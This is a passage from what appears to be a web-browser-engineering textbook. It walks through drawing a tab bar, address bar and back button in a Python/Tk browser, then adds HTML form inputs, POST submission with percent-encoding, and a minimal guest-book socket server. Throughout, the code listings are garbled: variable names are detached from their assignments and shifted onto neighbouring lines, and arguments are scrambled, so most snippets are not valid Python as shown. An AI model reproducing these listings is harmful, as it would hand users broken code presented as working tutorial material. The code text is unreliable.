Let’s start drawing the chrome. First: the tab bar at the top of the browser window. I’ll keep it simple, but this is still going to require some tedious and mildly tricky geometry.
class Browser:
def paint_chrome(self):
# ...
= get_font(20, "normal", "roman")
tabfont for i, tab in enumerate(self.tabs):
# ...
# ...
Python’s enumerate
function lets you iterate over both
the indices and the contents of an array at the same time. Let’s make
each tab 80 pixels wide and 40 pixels tall. We’ll label each tab
something like “Tab 4” so we don’t have to deal with long tab titles
overlapping. And let’s leave 40 pixels on the left for a button that
adds a new tab. Thus, the i
th tab starts at x
position 40 + 80*i
and ends at 120 + 80*i
:
for i, tab in enumerate(self.tabs):
= "Tab {}".format(i)
name = 40 + 80 * i, 120 + 80 * i x1, x2
For each tab, we need to create a border on the left and right and then draw the tab name:
for i, tab in enumerate(self.tabs):
# ...
0, x1, 40, "black", 1))
cmds.append(DrawLine(x1, 0, x2, 40, "black", 1))
cmds.append(DrawLine(x2, + 10, 10, name, tabfont, "black")) cmds.append(DrawText(x1
Finally, to identify which tab is the active tab, we’ve got to make that file folder shape with the current tab sticking up:
for i, tab in enumerate(self.tabs):
# ...
if i == self.active_tab:
0, 40, x1, 40, "black", 1))
cmds.append(DrawLine(40, WIDTH, 40, "black", 1)) cmds.append(DrawLine(x2,
The whole point of tab support is to have more than one tab around, and for that we need a button that creates a new tab. Let’s put that on the left of the tab bar, with a big plus in the middle:
class Browser:
def paint_chrome(self):
# ...
= get_font(30, "normal", "roman")
buttonfont 10, 10, 30, 30, "black", 1))
cmds.append(DrawOutline(11, 0, "+", buttonfont, "black")) cmds.append(DrawText(
Here the DrawOutline
command draws a rectangle’s border
instead of its inside. It’s defined like this:
class DrawOutline:
def __init__(self, x1, y1, x2, y2, color, thickness):
self.top = y1
self.left = x1
self.bottom = y2
self.right = x2
self.color = color
self.thickness = thickness
def execute(self, scroll, canvas):
canvas.create_rectangle(self.left, self.top - scroll,
self.right, self.bottom - scroll,
=self.thickness,
width=self.color,
outline )
The next step is clicking on tabs to switch between them. That has to
happen in the Browser
class, since it’s the
Browser
that stores which tab is active. So let’s go to the
handle_click
method and add a branch for clicking on the
browser chrome:
class Browser:
def handle_click(self, e):
if e.y < CHROME_PX:
# ...
else:
self.tabs[self.active_tab].click(e.x, e.y - CHROME_PX)
self.draw()
When the user clicks on the browser chrome (the if
branch), the browser handles it directly, but if the click is on the
page content (the else
branch) it is still forwarded to the
active tab, subtracting CHROME_PX
to fix up the
coordinates.
Within the browser chrome, the tab bar takes up the top 40 pixels,
starting 40 pixels from the left. Remember that the i
th tab
has x1 = 40 + 80*i
; we need to solve that equation for
i
to figure out which tab the user clicked on:
if e.y < CHROME_PX:
if 40 <= e.x < 40 + 80 * len(self.tabs) and 0 <= e.y < 40:
self.active_tab = int((e.x - 40) / 80)
Note the first condition on the if
statement: it makes
sure that if there are only two tabs, the user can’t switch to the
“third tab” by clicking in the blank space where that tab would go. That
would be bad, because then later references to “the active tab” would
error out.
Let’s also implement the button that adds a new tab. We need it to test tab switching, anyway:
if e.y < CHROME_PX:
# ...
elif 10 <= e.x < 30 and 10 <= e.y < 30:
self.load(URL("https://browser.engineering/"))
That’s an appropriate “new tab” page, don’t you think? Anyway, you should now be able to load multiple tabs, scroll and click around them independently, and switch tabs by clicking on them.
Google Chrome 1.0 was accompanied by a comic book to pitch its features. There’s a whole chapter about its design ideas and user interface features, many of which stuck around. Even this book’s browser has tabs on top, for example!
Now that we are navigating between pages all the time, it’s easy to get a little lost and forget what web page you’re looking at. An address bar that shows the current URL would help a lot.
class Browser:
def paint_chrome(self):
# ...
40, 50, WIDTH - 10, 90, "black", 1))
cmds.append(DrawOutline(= str(self.tabs[self.active_tab].url)
url 55, 55, url, buttonfont, "black")) cmds.append(DrawText(
Here str
is a built-in Python function that we can
override to correctly convert URL
objects to strings:
class URL:
def __str__(self):
= ":" + str(self.port)
port_part if self.scheme == "https" and self.port == 443:
= ""
port_part if self.scheme == "http" and self.port == 80:
= ""
port_part return self.scheme + "://" + self.host + port_part + self.path
I think the extra logic to hide port numbers makes the URLs more tidy.
To keep up appearances, the address bar needs a “back” button nearby. I’ll start by drawing the back button itself:
class Browser:
def paint_chrome(self):
# ...
10, 50, 35, 90, "black", 1))
cmds.append(DrawOutline(15, 50, "<", buttonfont, "black")) cmds.append(DrawText(
So what happens when that button is clicked? Well, that tab
goes back. Other tabs are not affected. So the Browser
has
to invoke some method on the current tab to go back:
class Browser:
def handle_click(self, e):
if e.y < CHROME_PX:
# ...
elif 10 <= e.x < 35 and 50 <= e.y < 90:
self.tabs[self.active_tab].go_back()
# ...
For the active tab to “go back”, it needs to store a “history” of which pages it’s visited before:
class Tab:
def __init__(self):
# ...
self.history = []
The history grows every time we go to a new page:
class Tab:
def load(self, url):
self.history.append(url)
# ...
Going back uses that history. You might think to write this:
class Tab:
def go_back(self):
if len(self.history) > 1:
self.load(self.history[-2])
That’s almost correct, but it doesn’t work if you click the back
button twice, because load
adds to the history. Instead, we
need to do something more like this:
class Tab:
def go_back(self):
if len(self.history) > 1:
self.history.pop()
= self.history.pop()
back self.load(back)
Now, going back shrinks the history and clicking on links grows it, as it should.
So we’ve now got a pretty good web browser for reading this very book: you can click links, browse around, and even have multiple chapters open simultaneously for cross-referencing things. But it’s a little hard to visit any other website…
A browser’s navigation history can contain sensitive information
about which websites a user likes visiting, so keeping it secure is
important. Surprisingly, this is pretty hard, because CSS features like
the :visited
selector can be used to check
whether a URL has been visited before.
One way to go to another page is by clicking on a link. But most browsers also allow you to type into the address bar to visit a new URL, if you happen to know the URL off-hand.
Take a moment to notice the complex ritual of typing in an address:
These steps suggest that the browser stores the contents of the
address bar separately from the url
field, and also that
there’s some state to say whether you’re currently typing into the
address bar. Let’s call the contents address_bar
and the
state focus
:
class Browser:
def __init__(self):
# ...
self.focus = None
self.address_bar = ""
Clicking on the address bar should set focus
and
clicking outside it should clear focus
:
class Browser:
def handle_click(self, e):
self.focus = None
if e.y < CHROME_PX:
# ...
elif 50 <= e.x < WIDTH - 10 and 50 <= e.y < 90:
self.focus = "address bar"
self.address_bar = ""
# ...
Note that clicking on the address bar also clears the address bar contents. That’s not quite what a browser does, but it’s pretty close, and lets us skip adding text selection.
Now, when we draw the address bar, we need to check whether to draw the current URL or the currently-typed text:
class Browser:
def paint_chrome(self):
# ...
if self.focus == "address bar":
cmds.append(DrawText(55, 55, self.address_bar, buttonfont, "black"))
else:
= str(self.tabs[self.active_tab].url)
url 55, 55, url, buttonfont, "black")) cmds.append(DrawText(
When the user is typing in the address bar, let’s also draw a cursor. Making states (like focus) visible on the screen (like with the cursor) makes the software easier to use:
if self.focus == "address bar":
# ...
= buttonfont.measure(self.address_bar)
w 55 + w, 55, 55 + w, 85, "black", 1)) cmds.append(DrawLine(
Next, when the address bar is focused, we need to support typing in a
URL. In Tk, you can bind to <Key>
to capture all key
presses. The event object’s char
field contains the
character the user typed:
class Browser:
def __init__(self):
# ...
self.window.bind("<Key>", self.handle_key)
def handle_key(self, e):
if len(e.char) == 0: return
if not (0x20 <= ord(e.char) < 0x7f): return
if self.focus == "address bar":
self.address_bar += e.char
self.draw()
This handle_key
handler starts with some conditions:
<Key>
fires for every key press, not just regular
letters, so we want to ignore cases where no character is typed (a
modifier key is pressed) or the character is outside the ASCII range
(which can represent the arrow keys or function keys). After we modify
address_bar
we also need to call draw()
so
that the new letters actually show up.
Finally, once the new URL is entered, we need to handle the “Enter”
key, which Tk calls <Return>
, and actually send the
browser to the new address:
class Browser:
def __init__(self):
# ...
self.window.bind("<Return>", self.handle_enter)
def handle_enter(self, e):
if self.focus == "address bar":
self.tabs[self.active_tab].load(URL(self.address_bar))
self.focus = None
self.draw()
So there—after a long chapter, you can now unwind a bit by surfing the web.
Text editing is surprisingly complex, and can be pretty tricky to implement well, especially for languages other than English. And nowadays URLs can be written in any language, though modern browsers restrict this somewhat for security reasons.
It’s been a lot of work just to handle links! We had to:
Now just imagine all the features you can add to your browser!
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
class URL:
def __init__(url)
def request()
def resolve(url)
def __str__()
def tree_to_list(tree, list)
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
CHROME_PX
class Tab:
def __init__()
def load(url)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
if __name__ == "__main__"
If you run it, it should look something like this:
Backspace: Add support for the backspace key when typing in the address bar. Honestly, do this exercise just for your sanity.
Middle-click: Add support for middle-clicking on a link
(Button-2
) to open it in a new tab. You might need a mouse
to test this easily.
Forward: Add a forward button, which should undo the back button. If the most recent navigation action wasn’t a back button, the forward button shouldn’t do anything. Draw it in gray in that case, so the user isn’t stuck wondering why it doesn’t work. Also draw the back button in gray if there’s nowhere to go back to.
Fragments: URLs can contain a fragment, which comes
at the end of a URL and is separated from the path by a hash sign
#
. When the browser navigates to a URL with a fragment, it
should scroll the page so that the element with that identifier is at
the top of the screen. Also, implement fragment links: relative URLs
that begin with a #
don’t load a new page, but instead
scroll the element with that identifier to the top of the screen. The
table of contents on this page uses fragment links.
Search: If the user types something that’s not a
URL into the address bar, make your browser automatically search for it
with a search engine. This usually means going to a special URL. For
example, you can search Google by going to
https://google.com/search?q=QUERY
, where QUERY
is the search query with every space replaced by a +
sign.Actually, you need
to escape lots of
punctuation characters in these “query strings”, but that’s kind of
orthogonal to this address bar search feature.
Visited Links: In real browsers, links you’ve visited before are usually purple. Implement that feature. You’ll need to store the set of visited URLs, annotate the corresponding HTML elements, and check those annotations when drawing the text.Real browsers support special pseudo-class selectors that select all visited links, which you could implement if you want.
Bookmarks: Implement basic bookmarks. Add a button
to the browser chrome; clicking it should bookmark the page. When you’re
looking at a bookmarked page, that bookmark button should look different
(maybe yellow?) to remind the user that the page is bookmarked, and
clicking it should un-bookmark it. Add a special web page,
about:bookmarks
, for viewing the list of bookmarks.
Cursor: Make the left and right arrow keys move the text cursor around the address bar when it is focused. Pressing the backspace key should delete the character before the cursor, and typing other keys should add characters at the cursor. (Remember that the cursor can be before the first character or after the last!)
Multiple windows Add support for multiple browser windows in
addition to tabs. This will require keeping track of multiple Tk windows
and canvases and grouping tabs by their containing window. You’ll also
need some way to create a new window, perhaps with a keypress such as
Ctrl+N
.
So far, our browser has seen the web as read only—but when you post on Facebook, fill out a survey, or search Google, you’re sending information to servers as well as receiving information from them. In this chapter, we’ll start to transform our browser into a platform for web applications by building out support for HTML forms, the simplest way for a browser to send information to a server.
HTML forms have a couple of moving pieces.
First, in HTML, there is a form
element, which contains
input
elements,There are other elements similar to input
,
such as select
and textarea
. They work
similarly enough; they just represent different kinds of user controls,
like dropdowns and multi-line inputs. which in turn can be
edited by the user. So a form might look like this:
<form action="/submit" method="post">
<p>Name: <input name=name value=1></p>
<p>Comment: <input name=comment value=2></p>
<p><button>Submit!</button></p>
</form>
This form contains two text entry boxes called name
and
comment
. When the user goes to this page, they can click on
those boxes to edit their values. Then, when they click the button at
the end of the form, the browser collects all of the name/value pairs
and bundles them into an HTTP POST
request (as indicated by
the method
attribute), sent to the URL given by the
form
element’s action
attribute, with the
usual rules of relative URLs—so in this case, /submit
. The
POST
request looks like this:
POST /submit HTTP/1.0
Host: example.org
Content-Length: 16
name=1&comment=2
In other words, it’s a lot like the regular GET
requests
we’ve already seen, except that it has a body—you’ve already seen HTTP
responses with bodies, but requests can have them too. Note the
Content-Length
header; it’s mandatory for POST
requests. The server responds to this request with a web page, just like
normal, and the browser then does everything it normally does.
Implementing forms requires extending many parts of the browser, from
implementing HTTP POST
through new layout objects that draw
input
elements to handling buttons clicks. That makes it a
great starting point for transforming our toy browser into an
application platform, our goal for these next few chapters. Let’s get
started implementing it all!
HTML forms were first standardized in HTML+, which also proposed tables, mathematical equations, and text that wraps around images. Amazingly, all three of these technologies survive, but in totally different standards: tables in RFC 1942, equations in MathML, and floating images in CSS 1.0.
First, let’s draw the input areas that the user will type into.Most applications use OS
libraries to draw input areas, so that those input areas look like other
applications on that OS. But browsers need a lot of control over
application styling, so they often draw their own input
areas. Input areas are inline content, laid out in lines
next to text. So to support inputs we’ll need a new kind of layout
object, which I’ll call InputLayout
. We can copy
TextLayout
and use it as a template, though we’ll need to
make some quick edits.
First, there’s no word
argument to
InputLayout
s:
class InputLayout:
def __init__(self, node, parent, previous):
self.node = node
self.children = []
self.parent = parent
self.previous = previous
Second, input
elements usually have a fixed width:
= 200
INPUT_WIDTH_PX
class InputLayout:
def layout(self):
# ...
self.width = INPUT_WIDTH_PX
# ...
The input
and button
elements need to be
visually distinct so the user can find them easily. Our browser’s
styling capabilities are limited, so let’s use background color to do
that:
input {font-size: 16px; font-weight: normal; font-style: normal;
background-color: lightblue;
}
button {font-size: 16px; font-weight: normal; font-style: normal;
background-color: orange;
}
When the browser paints an InputLayout
it needs to draw
the background:
class InputLayout:
def paint(self, display_list):
= self.node.style.get("background-color",
bgcolor "transparent")
if bgcolor != "transparent":
= self.x + self.width, self.y + self.height
x2, y2 = DrawRect(self.x, self.y, x2, y2, bgcolor)
rect display_list.append(rect)
It then needs to get the input element’s text contents:
class InputLayout:
def paint(self, display_list):
# ...
if self.node.tag == "input":
= self.node.attributes.get("value", "")
text elif self.node.tag == "button":
if len(self.node.children) == 1 and \
isinstance(self.node.children[0], Text):
= self.node.children[0].text
text else:
print("Ignoring HTML contents inside button")
= "" text
Note that <button>
elements can in principle
contain complex HTML, not just a text node. I’m having the browser print
a warning and skip the text in that case.There’s an exercise on this.
Finally, we draw that text:
class InputLayout:
def paint(self, display_list):
= self.node.style["color"]
color
display_list.append(self.x, self.y, text, self.font, color)) DrawText(
By this point in the book, you’ve seen many layout objects, so I’m glossing over these changes. The point is that new layout objects are one standard way to extend the browser.
We now need to create some InputLayout
s, which we can do
in BlockLayout
:
class BlockLayout:
def recurse(self, node):
if isinstance(node, Text):
# ...
else:
if node.tag == "br":
self.new_line()
elif node.tag == "input" or node.tag == "button":
self.input(node)
else:
for child in node.children:
self.recurse(child)
Note that I don’t recurse into button
elements, because
the button
element draws its own contents.Though you’ll need to do this
differently for one of the exercises below. Since
input
elements are self-closing, they never have
children.
Finally, this new input
method is similar to the
text
method, creating a new layout object and adding it to
the current line:It’s so
similar in fact that they only differ in the w
variable
definition, and the need to loop over words. I’ll resist the temptation
to refactor this code until we get to Chapter
15.
class BlockLayout:
def input(self, node):
= INPUT_WIDTH_PX
w if self.cursor_x + w > self.width:
self.new_line()
= self.children[-1]
line input = InputLayout(node, line, self.previous_word)
input)
line.children.append(self.previous_word = input
= self.get_font(node)
font self.cursor_x += w + font.measure(" ")
But actually, there are a couple more complications due to the way we
decided to resolve the block-mixed-with-inline-siblings problem (see Chapter 5). One is that if there are
no children for a node, we assume it’s a block element. But
<input>
elements don’t have children, yet must have
inline layout or else they won’t draw correctly. Likewise, a
<button>
does have children, but they are treated
specially.This situation
is specific to these elements in our browser, but only because they are
the only elements with special painting behavior within an inline
context. These are also two examples of atomic
inlines.
We can fix that with this change to layout_mode
:
class BlockLayout:
def layout_mode(self):
if isinstance(self.node, Text):
return "inline"
elif self.node.children:
for child in self.node.children:
if isinstance(child, Text): continue
if child.tag in BLOCK_ELEMENTS:
return "block"
return "inline"
elif self.node.tag == "input":
return "inline"
else:
return "block"
The second problem is that, again due to having block siblings,
sometimes an InputLayout
will end up wrapped in a
BlockLayout
that refers to the <input>
or <button>
node. But both BlockLayout
and InputLayout
have a paint
method, which
means we’re painting the node twice. We can fix that with some simple
logic to skip painting them via BlockLayout
in this
case:See also the
footnote earlier about how atomic inlines are often special in these
kinds of ways. It’s worth noting that there are various other ways that
our browser does not fully implement all the complexities of inline
painting—one example is that it does not correctly paint nested inlines
with different background colors.
class BlockLayout:
# ...
def paint(self, display_list):
# ...
= not isinstance(self.node, Text) and \
is_atomic self.node.tag == "input" or self.node.tag == "button")
(
if not is_atomic:
if bgcolor != "transparent":
= self.x + self.width, self.y + self.height
x2, y2 = DrawRect(self.x, self.y, x2, y2, bgcolor)
rect display_list.append(rect)
With these changes the browser should now draw input
and
button
elements as blue and orange rectangles.
The reason buttons surround their contents but input areas don’t is
that a button can contain images, styled text, or other content. In a
real browser, that relies on the inline-block
display mode: a way of putting a block element into a line of text.
There’s also an older <input type=button>
syntax more
similar to text inputs.
We’ve got input
elements rendering, but you can’t edit
their contents yet. But of course that’s the whole point! So let’s make
input
elements work like the address bar does—clicking on
one will clear it and let you type into it.
Clearing is easy, another case inside Tab
’s
click
method:
class Tab:
def click(self, x, y):
while elt:
# ...
elif elt.tag == "input":
"value"] = ""
elt.attributes[# ...
However, if you try this, you’ll notice that clicking does not
actually clear the input
element. That’s because the code
above updates the HTML tree—but we need to update the layout tree and
then the display list of the change to appear on the screen.
Right now, the layout tree and display list are computed in
load
, but we don’t want to reload the whole page; we just
want to redo the styling, layout, paint and draw phases. Together these
are called rendering. So let’s extract these phases into a new
Tab
method, render
:
class Tab:
def load(self, url, body=None):
# ...
self.render()
def render(self):
self.nodes, sorted(self.rules, key=cascade_priority))
style(self.document = DocumentLayout(self.nodes)
self.document.layout()
self.display_list = []
self.document.paint(self.display_list)
For this code to work, you’ll also need to change nodes
and rules
from local variables in the load
method to new fields on a Tab
. Note that styling moved from
load
to render
, but downloading the style
sheets didn’t—we don’t re-download the style sheetsActually, some changes to the
web page could delete existing link
nodes or create new
ones. Real browsers respond to this correctly, either removing the rules
corresponding to deleted link
nodes or downloading new
style sheets when new link
nodes are created. This is
tricky to get right, and typing into an input area definitely can’t make
such changes, so let’s skip this in our browser. every
time you type!
Now when we click an input
element and clear its
contents, we can call render
to redraw the page with the
input
cleared:
class Tab:
def click(self, x, y):
while elt:
elif elt.tag == "input":
"value"] = ""
elt.attributes[return self.render()
So that’s clicking in an input
area. But typing is
harder. Think back to how we implemented the
address bar: we added a focus
field that remembered
what we clicked on so we could later send it our key presses. We need
something like that focus
field for input areas, but it’s
going to be more complex because the input areas live inside a
Tab
, not inside the Browser
.
Naturally, we will need a focus
field on each
Tab
, to remember which text entry (if any) we’ve recently
clicked on:
class Tab:
def __init__(self):
# ...
self.focus = None
Now when we click on an input element, we need to set
focus
(and clear focus if nothing was found to focus
on):
class Tab:
def click(self, x, y):
self.focus = None
# ...
while elt:
elif elt.tag == "input":
self.focus = elt
# ...
But remember that keyboard input isn’t handled by the
Tab
—it’s handled by the Browser
. So how does
the Browser
even know when keyboard events should be sent
to the Tab
? The Browser
has to remember that
in its own focus
field!
In other words, when you click on the web page, the
Browser
updates its focus
field to remember
that the user is interacting with the page, not the browser
interface:
class Browser:
def handle_click(self, e):
if e.y < CHROME_PX:
self.focus = None
# ...
else:
self.focus = "content"
# ...
self.draw()
The if
branch that corresponds to clicks in the browser
interface unsets focus
by default, but some existing code
in that branch will set focus
to "address bar"
if the user actually clicked in the address bar.
When a key press happens, the Browser
sends it either to
the address bar or calls the active tab’s keypress
method:
class Browser:
def handle_key(self, e):
# ...
elif self.focus == "content":
self.tabs[self.active_tab].keypress(e.char)
self.draw()
That keypress
method then uses the tab’s
focus
field to put the character in the right text
entry:
class Tab:
def keypress(self, char):
if self.focus:
self.focus.attributes["value"] += char
self.render()
Note that here we call render
instead of
draw
, because we’ve modified the web page and thus need to
regenerate the display list instead of just redrawing it to the
screen.
Hierarchical focus handling is an important pattern for combining
graphical widgets; in a real browser, where web pages can be embedded
into one another with iframe
s,The iframe
element allows you to embed one web page into another as a little
window. the focus tree can be arbitrarily deep.
So now we have user input working with input
elements.
Before we move on, there is one last tweak that we need to make: drawing
the text cursor in the Tab
’s render
method.
This turns out to be harder than expected: the cursor should be drawn by
the InputLayout
of the focused node, and that means that
each node has to know whether or not it’s focused:
class Element:
def __init__(self, tag, attributes, parent):
# ...
self.is_focused = False
Add the same field to Text
nodes; they’ll never be
focused and never draw cursors, but it’s more convenient if
Text
and Element
have the same fields. We’ll
set this when we move focus to an input element:
class Tab:
def click(self, x, y):
while elt:
elif elt.tag == "input":
"value"] = ""
elt.attributes[if self.focus:
self.focus.is_focused = False
self.focus = elt
= True
elt.is_focused return self.render()
Note that we have to un-focusUn-focusing is called “blurring”, which can get a bit
confusing. the currently-focused element, lest it keep
drawing its cursor. Anyway, now we can draw a cursor if an
input
element is focused:
class InputLayout:
def paint(self, display_list):
# ...
if self.node.is_focused:
= self.x + self.font.measure(text)
cx
display_list.append(DrawLine(self.y, cx, self.y + self.height, "black", 1)) cx,
Now you can click on a text entry, type into it, and modify its value. The next step is submitting the now-filled-out form.
The code that draws the text cursor here is kind of clunky—you could imagine each layout object knowing if it’s focused and then being responsible for drawing the cursor. That’s the more traditional approach in GUI frameworks, but Chrome for example keeps track of a global focused element to make sure the cursor can be globally styled.
You submit a form by clicking on a button
. So let’s add
another condition to the big while
loop in
click
:
class Tab:
def click(self, x, y):
while elt:
# ...
elif elt.tag == "button":
# ...
# ...
Once we’ve found the button, we need to find the form that it’s in, by walking up the HTML tree:
elif elt.tag == "button":
while elt:
if elt.tag == "form" and "action" in elt.attributes:
return self.submit_form(elt)
= elt.parent elt
The submit_form
method is then in charge of finding all
of the input elements, encoding them in the right way, and sending the
POST
request. First, we look through all the descendents of
the form
to find input
elements:
class Tab:
def submit_form(self, elt):
= [node for node in tree_to_list(elt, [])
inputs if isinstance(node, Element)
and node.tag == "input"
and "name" in node.attributes]
For each of those input
elements, we need to extract the
name
attribute and the value
attribute, and
form-encode both of them. Form encoding is how the name/value
pairs are formatted in the HTTP POST
request. Basically:
name, then equal sign, then value; and name-value pairs are separated by
ampersands:
class Tab:
def submit_form(self, elt):
# ...
= ""
body for input in inputs:
= input.attributes["name"]
name = input.attributes.get("value", "")
value += "&" + name + "=" + value
body = body [1:] body
Now, any time you see something like this, you’ve got to ask: what if
the name or the value has an equal sign or an ampersand in it? So in
fact, “percent encoding” replaces all special characters with a percent
sign followed by those characters’ hex codes. For example, a space
becomes %20
and a period becomes %2e
. Python
provides a percent-encoding function as quote
in the
urllib.parse
module:You can write your own percent_encode
function
using Python’s ord
and hex
functions if you’d
like. I’m using the standard function for expediency. Earlier in the book, using these library functions
would have obscured key concepts, but by this point percent encoding is
necessary but not conceptually interesting.
for input in inputs:
# ...
= urllib.parse.quote(name)
name = urllib.parse.quote(value)
value # ...
Now that submit_form
has built a request body, it needs
to make a POST
request. I’m going to defer that
responsibility to the load
function, which handles making
requests:
def submit_form(self, elt):
# ...
= self.url.resolve(elt.attributes["action"])
url self.load(url, body)
The new body
argument to load
is then
passed through to request
:
def load(self, url, body=None):
# ...
= url.request(body)
headers, body # ...
In request
, this new argument is used to decide between
a GET
and a POST
request:
class URL:
def request(self, payload=None):
# ...
= "POST" if payload else "GET"
method # ...
= "{} {} HTTP/1.0\r\n".format(method, self.path)
body # ...
If there it’s a POST
request, the
Content-Length
header is mandatory:
class URL:
def request(self, payload=None):
# ...
if payload:
= len(payload.encode("utf8"))
length += "Content-Length: {}\r\n".format(length)
body # ...
Note that the Content-Length
is the length of the
payload in bytes, which might not be equal to its length in
letters.Because
characters from many languages are encoded as multiple
bytes. Finally, after the headers, we send the payload
itself:
class URL:
def request(self, payload=None):
# ...
+= "\r\n" + (payload if payload else "")
body "utf8"))
s.send(body.encode(# ...
So that’s how the POST
request gets sent. Then the
server responds with an HTML page and the browser will render it in the
totally normal way. That’s basically it for forms!
While most form submissions use the form encoding described here,
forms with file uploads (using <input type=file>
) use
a different
encoding that includes metadata for each key-value pair (like the
file name or file type). There’s also an obscure text/plain
encoding option, which uses no escaping and which even the standard
warns against using.
So… How do web applications (a.k.a. web apps) use forms? When you use an application from your browser—whether you are registering to vote, looking at pictures of your baby cousin, or checking your email—there are typicallyHere I’m talking in general terms. There are some browser applications without a server, and others where the client code is exceptionally simple and almost all the code is on the server. two programs involved: client code that runs in the browser, and server code that runs on the server. When you click on things or take actions in the application, that runs client code, which then sends data to the server via HTTP requests.
For example, imagine a simple message board application. The server stores the state of the message board—who has posted what—and has logic for updating that state. But all the actual interaction with the page—drawing the posts, letting the user enter new ones—happens in the browser. Both components are necessary.
The browser and the server interact over HTTP. The browser first makes a GET request to the server to load the current message board. The user interacts with the browser to type a new post, and submits it to the server (say, via a form). That causes the browser to make a POST request to the server, which instructs the server to update the message board state. The server then needs the browser to update what the user sees; with forms, the server sends a new HTML page in its response to the POST request.
Forms are a simple, minimal introduction to this cycle of request and response and make a good introduction to how browser applications work. They’re also implemented in every browser and have been around for decades. These days many web applications use the form elements, but replace synchronous POST requests with asynchronous ones driven by Javascript,In the early 2000s, the adoption of asynchronous HTTP requests sparked the wave of innovative new web applications called Web 2.0. which makes applications snappier by hiding the time to make the HTTP request. In return for that snappiness, that JavaScript code must now handle errors, validate inputs, and indicate loading time. In any case, both synchronous and asynchronous uses of forms are based on the same principles of client and server code.
There are request types besides GET and POST, like PUT (create if nonexistant) and DELETE, or the more obscure CONNECT and TRACE. In 2010 the PATCH method was standardized in RFC 5789. New methods were intended as a standard extension mechanism for HTTP, and some protocols were built this way (like WebDav’s PROPFIND, MOVE, and LOCK methods), but this did not become an enduring way to extend the web, and HTTP 2.0 and 3.0 did not add any new methods.
To better understand the request/response cycle, let’s write a simple web server. It’ll implement an online guest book,They were very hip in the 90s—comment threads from before there was anything to comment on. kind of like an open, anonymous comment thread. Now, this is a book on web browser engineering, so I won’t discuss web server implementation that thoroughly. But I want you to see how the server side of an application works.
A web server is a separate program from the web browser, so let’s start a new file. The server will need to:
Let’s start by opening a socket. Like for the browser, we need to create an internet streaming socket using TCP:
import socket
= socket.socket(
s =socket.AF_INET,
familytype=socket.SOCK_STREAM,
=socket.IPPROTO_TCP,
proto
)1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,
The setsockopt
call is optional. Normally, when a
program has a socket open and it crashes, your OS prevents that port
from being reusedWhen
your process crashes, the computer on the end of the connection won’t be
informed immediately; if some other process opens the same port, it
could receive data meant for the old, now-dead process.
for a short period. That’s annoying when developing a server; calling
setsockopt
with the SO_REUSEADDR
option allows
the OS to immediately reuse the port.
Now, with this socket, instead of calling connect
(to
connect to some other server), we’ll call bind
, which waits
for other computers to connect:
'', 8000))
s.bind(( s.listen()
Let’s look at the bind
call first. Its first argument
says who should be allowed to make connections to the server;
the empty string means that anyone can connect. The second argument is
the port others must use to talk to our server; I’ve chosen
8000
. I can’t use 80, because ports below 1024 require
administrator privileges, but you can pick something other than 8000 if,
for whatever reason, port 8000 is taken on your machine.
Finally, after the bind
call, the listen
call tells the OS that we’re ready to accept connections.
To actually accept those connections, we enter a loop that runs once
per connection. At the top of the loop we call s.accept
to
wait for a new connection:
while True:
= s.accept()
conx, addr handle_connection(conx)
That connection object is, confusingly, also a socket: it is the socket corresponding to that one connection. We know what to do with those: we read the contents and parse the HTTP message. But it’s a little trickier in the server than in the browser, because the server can’t just read from the socket until the connection closes—the browser is waiting for the server and won’t close the connection.
So we’ve got to read from the socket line-by-line. First, we read the request line:
def handle_connection(conx):
= conx.makefile("b")
req = req.readline().decode('utf8')
reqline = reqline.split(" ", 2)
method, url, version assert method in ["GET", "POST"]
Then we read the headers until we get to a blank line, accumulating the headers in a dictionary:
def handle_connection(conx):
# ...
= {}
headers while True:
= req.readline().decode('utf8')
line if line == '\r\n': break
= line.split(":", 1)
header, value = value.strip() headers[header.lower()]
Finally we read the body, but only when the
Content-Length
header tells us how much of it to read
(that’s why that header is mandatory on POST
requests):
def handle_connection(conx):
# ...
if 'content-length' in headers:
= int(headers['content-length'])
length = req.read(length).decode('utf8')
body else:
= None body
Now the server needs to generate a web page in response. We’ll get to
that later; for now, just abstract that away behind a
do_request
call:
def handle_connection(conx):
# ...
= do_request(method, url, headers, body) status, body
The server then sends this page back to the browser:
def handle_connection(conx):
# ...
= "HTTP/1.0 {}\r\n".format(status)
response += "Content-Length: {}\r\n".format(
response len(body.encode("utf8")))
+= "\r\n" + body
response 'utf8'))
conx.send(response.encode( conx.close()
This is all pretty bare-bones: our server doesn’t check that the
browser is using HTTP 1.0 to talk to it, it doesn’t send back any
headers at all except Content-Length
, it doesn’t support
TLS, and so on. Again: this is a web browser book—it’ll do.
